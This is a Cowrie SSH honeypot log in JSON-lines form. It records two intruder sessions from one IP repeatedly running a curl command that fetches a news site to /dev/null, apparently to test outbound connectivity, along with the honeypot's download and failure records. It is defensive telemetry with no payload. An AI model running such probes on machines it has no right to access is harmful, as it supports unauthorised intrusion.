{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.663039Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.664485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.665764Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.685258Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.690984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.692165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.701141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.702173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.704989Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.732918Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.734313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.744415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.745539Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.770976Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.772191Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.783593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.788532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.789543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.796663Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.810578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.811794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.827447Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.828850Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.832726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.833731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.852766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.853893Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.865042Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.882215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.883387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.893898Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.899029Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.900139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.921731Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.926897Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.927921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.957501Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.958721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:45.980937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:45.982068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.010138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.011403Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.036935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.038462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.043521Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.045470Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.054735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.063803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.085266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.091805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.092883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.124086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.125429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.127294Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.129267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.143757Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.155985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.164160Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.178719Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.179873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.182341Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.184865Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.201885Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.208802Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.209898Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.210790Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.219526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.220999Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.244988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.246296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.263880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.265400Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.272754Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.280454Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.281931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.308141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.309568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.312578Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.326453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.328104Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.347440Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.348578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.365852Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.367169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.368369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.389868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.391217Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.406622Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.409098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.410380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.432288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.433449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.446385Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.450162Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.468825Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
